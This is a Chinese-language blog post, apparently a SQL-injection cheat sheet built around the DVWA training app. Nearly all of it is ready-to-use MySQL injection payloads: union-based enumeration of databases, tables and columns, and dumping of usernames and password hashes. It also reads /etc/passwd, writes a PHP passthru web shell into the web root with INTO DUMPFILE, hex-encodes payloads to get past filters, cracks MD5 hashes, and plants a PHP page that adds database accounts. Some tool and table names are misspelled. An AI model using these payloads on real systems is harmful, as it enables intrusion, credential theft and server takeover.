WEB渗透 - SQL注入（持续更新）

SQL注入

按变量类型分：数字型和字符型

按HTTP提交方式分：POST注入、GET注入和Cookie注入

按注入方式分：布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入

按数据库类型分：

sql：oracle、mysql、mssql、access、sqlite、postgersql

nosql：mongodb、redis

布尔型

0x01 检测有无注入

1' and '1'='1 1' and '1'='2 简化版 1' and '1 1' and '0

猜测服务器端查询语句是：select xx from table where id='1'

0x02 检测表的列数

' order by 10 --+

猜测服务器端查询语句是：select xx from table where id=' ' order by 10 --'

0x03 检测显示信息位

' union select 1,2 --

union联合查询，同时显示多个select查询结果

0x04 显示信息位替换成查询语句

' union select user(),@@datadir --

从元数据表information_schema查询信息

0x001 查库名

' union select schema_name from information_schema.schemata --

0x002 查一个库里的所有表

' union select table_name from information_schema.tables where table_schema='...' --

0x003 查列名

' union select column_name from infomation_schema.columns where table_schema='...' and table_name='...' --

0x004 查列内容

' union select user,password from dvwa.users -- ' union select user,password from users -- ' union select null,concat(user,0x3a,password) from users --

查所有库以及表

' union select table_name,table_schema from information_schema.tables --

统计每个库中表的数量

' union select table_schema,count(*) from information_schema.tables group by table_schema --

sql注入其他利用

读取文件

union select load_file('/etc/passwd') --

写入文件

union select "<?php passthru($_GET['a']);?>" into dumpfile "/var/www/a.php" --
//不指定路径的话会写在默认路径下
//目录没权限的话可以放在通用目录/tmp
//往往需要配合文件包含漏洞

如果一句话被过滤，可以使用16进制编码

cat a.php | xxd -ps | tr -d '\n' //打开a.php 用xxd以16进制显示出来 tr -d删除最后的换行符 //然后在链接里注入 union select (0x16进制数) into dumpfile '写入路径' -- //括号前如果有逗号，得加空格

把查询内容保存在本地文件

union select concat(user,0x3a,password) from users into outfile '/tmp/a.php' --

全局函数

@@datadir 数据库当前位置

@@hostname 主机名

@@VERSION 版本

@@version_compile_os 当前操作系统版本

ASCLL码转字符（用于绕过）

char()

连接字符串

concat_ws(分割字符，字符串1，字符串2)

计算哈希

md5()

以特定符号分割字符串

substring_index(查询语句，"分割符"，查看分割后的第几段)

破解hash值

join 开源密码破解工具（linux里）

join --format=raw-MD5 xxx.txt

#如果已经破解过会报错

一个思路：编写服务器端代码写入，以添加账号

写入后访问这个文件，在网页填写数值并提交

union select  '<?php if(isset($_POST["submit"]))  {  $userID = $_POST["userID"];  $first_name = $_POST["first_name"];  $last_name = $_POST["last_name"]; $username = $_POST["username"];  $avatar = $_POST["avatar"];  echo "userID: $userID<BR>";  echo "first_name: $first_name<BR>";  echo "last_name: $last_name<BR>";  echo "username: $username<BR>";  echo "avatar: $avatar<BR>"; $con=mysqli_connect("127.0.0.1","root","","dvwa");  if (mysqli_connect_errno())  {  echo "Failed to connect to MySQL: " . mysqli_connect_error();  } else {  echo "Connected to database<BR>";  }  $password = "123";  $sql="insert into dvwa.users values  (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\\")";  if (mysqli_query($con,$sql))  {  echo "[Successful Insertion]: $sql";  } else {  echo "Error creating database: " . mysqli_error($con); } mysqli_close($con);  } ?>  <form method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>">  <input type="text" name="userID" value="33">  <br>  <input type="text" name="first_name" value="fh"> <br>  <input type="text" name="last_name" value="y"> <br>  <input type="text" name="username" value="yfh"> <br> <input type="text" name="avatar" value="yfh!"> <br>  <input type="submit" name="submit" value="Submit Form"> <br>  </form> ' INTO DUMPFILE '/tmp/user.php' -- 

' union select null,'<?php if(isset($_POST["submit"])) { $userID = $_POST["userID"]; $first_name = $_POST["first_name"]; $last_name = $_POST["last_name"]; $username = $_POST["username"]; $avatar = $_POST["avatar"]; echo "userID: $userID<BR>"; echo "first_name: $first_name<BR>"; echo "last_name: $last_name<BR>"; echo "username: $username<BR>"; echo "avatar: $avatar<BR>"; $con=mysqli_connect("127.0.0.1","root","","dvwa"); if (mysqli_connect_error()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected to database<BR>"; } $password = "123"; $sql="insert into dvwa.users values (\\"$userID\\",\ \"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$password\\"),\\"$avatar\ \")"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Error creating database: " . mysqli_error($con); } mysqli_close($con); } ?> <form method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>"> <input type="text" name="userID" value="33"><br> <input type="text" name="first_name" value="fh"><br> <input type="text" name="last_name" value="y"><br> <input type="text" name="username" value="yfh"><br> <input type="text" name="avatar" value="yfh!"><br> <input type="submit" name="submit" value="Submit Form"><br> </form>' INTO DUMPFILE '/tmp/user.php' -- 

来源：https://www.cnblogs.com/drac4ry/p/12250937.html